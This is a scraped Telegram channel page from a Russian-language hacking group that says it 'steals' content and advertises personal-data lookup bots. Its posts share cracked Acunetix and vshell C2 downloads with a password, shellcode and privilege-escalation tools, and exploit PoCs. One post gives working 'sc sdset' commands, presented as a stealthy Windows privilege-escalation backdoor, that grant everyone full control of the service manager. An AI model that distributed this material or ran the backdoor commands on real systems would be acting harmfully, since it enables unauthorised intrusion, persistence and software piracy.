C.I.T. Security – Telegram
C.I.T. Security
8.13K subscribers
2.83K photos
254 videos
4.19K files
4.1K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://news.1rj.ru/str/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Acunetix v24.8 - 29 Aug 2024

Windows: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.8.240828144-Windows-Pwn3rzs-CyberArsenal.rar

Linux: https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.8.240828144-Linux-Pwn3rzs-CyberArsenal.7z

Password: Pwn3rzs

Changelog:

Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v24-8-0-29-august-2024/
🔥1
vshell_4.6.0_win64-pwn3rzs.7z
124 MB
c2 (closed source, for windows)

see readme for instructions.
vshell_linux_amd64_4.6.0-pwn3rzs.7z
134.2 MB
vshell 4.6.0 - linux version of author- abandoned c2.
unpacked by rootkies, cracked by zen using same method as for win64 released yesterday.

see readme.txt
1
part 6.zip
1.2 GB
👩‍💻 Kali Linux Deep Dive

Год выпуска: 2021

Добро пожаловать на курс Kali Linux Deep Dive!


Этот курс предназначен для людей, которые уже обладают общими знаниями в области ИТ, поэтому обязательно ознакомьтесь со списком предварительных требований, прежде чем начать.

На протяжении всего курса мы углубимся в суть взлома на аппаратном уровне.

Так были обнаружены практически все уязвимости - люди, просматривающие исходный код или двоичные файлы обратного проектирования.

#info #Kali #Linux // nsis
👍42
Хакер-261.pdf
48.8 MB
🤯 Логические баги - Xakep выпуск №261.

«Хакер» пери­оди­чес­ки пишет о том, как работа­ют уяз­вимос­ти в движ­ках сай­тов и раз­ных ком­понен­тах.

В этом выпуске мы раз­берем четыре типичных уязвимости и на их при­мерах покажем, как самостоятельно находить баги в коде веб‑при­ложе­ний.

Также в номере:
🔵Тестируем телеграм-боты для поиска персональных данных
🔵Делаем свои соревнования для хакеров
🔵Обходим антивирус в Windows 10
🔵Создаем userland-руткиты в Linux
🔵Делаем машину для бекапа за 10 баксов
🔵Изучаем типы замков и их слабые места

#info #Vulnerabillity #Windows #Linux // nsis
👍2
☁️ Список удивительно потрясающих инструментов OSINT

Awesome OSINT - это список удивительно потрясающих инструментов и ресурсов OSINT-разведки с открытым исходным кодом.

Этот список должен помочь всем тем, кто увлекается разведкой киберугроз (CTI), охотой на угрозы или OSINT. От новичка до продвинутого.

Счастливого взлома и охоты.


➡️ https://github.com/jivoi/awesome-osint

#tool #OSINT #CTI // nsis
😡 Справочник анонима. Теория и практика шифрования почты

Есть такая занятная штука — тайна переписки. Правда, широко известно о ней лишь в очень узких кругах анонимусов.

По крайней мере, правительства и спецслужбы о ней слыхом не слыхивали, да и некоторые коммерсанты очень любят сунуть свой любопытный нос в чужой почтовый ящик: а вдруг удастся разнюхать что-то о предпочтениях абонента и прислать ему еще немного бесполезной рекламы?

Сегодня мы поговорим о том, как защитить свою электронную почту от постороннего назойливого внимания.

➡️ https://xakep.ru/2019/06/25/emails-encryption/

#info #Anonymity #Mail // nsis
windows IPv6 exploit
опубликован
бесплатно
навсегда
какие30тыщ?
2👍2
Реверс-инжиниринг и эксплуатация терминалов бесконтактной оплаты
*
Слайды тут
Видео тут
ShellGen
*
Павашэлл скрипт для генерации ShellCode в различных форматах.
Форматы: Raw, ps1, Hex, C, vba, csharp
Архитектура: x64, x86
*
DownLoad
prv8_nuclei_templates.zip
3.9 MB
Nuclei templates
*
6000 штук
This media is not supported in your browser
VIEW IN TELEGRAM
SUDO_KILLER
*
Скрипт под:
Сбор учетных данных
Неправильные конфигурации
Опасные двоичные файлы (GTFOBINS)
Уязвимые версии sudo — CVE
Уязвимость Sudo и неправильная конфигурация, связанные с 3dParty
Опасные переменные окружающей среды
Доступные для записи каталоги, в которых есть скрипты
Двоичные файлы, которые можно заменить/переместить
*
Download + много демо + докер для тестов

#sudo
2
CVE-2024-24401 NAGIOS
*
Authenticated SQL Injection
*
POC exploit
Легальный и малозаметный LPE backdoor в WiNd0z
*
Разрешаем удаленное использование Services.msc
sc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)

sc.exe sdset scmanager D:(A;;KA;;;WD)


#win #backdoor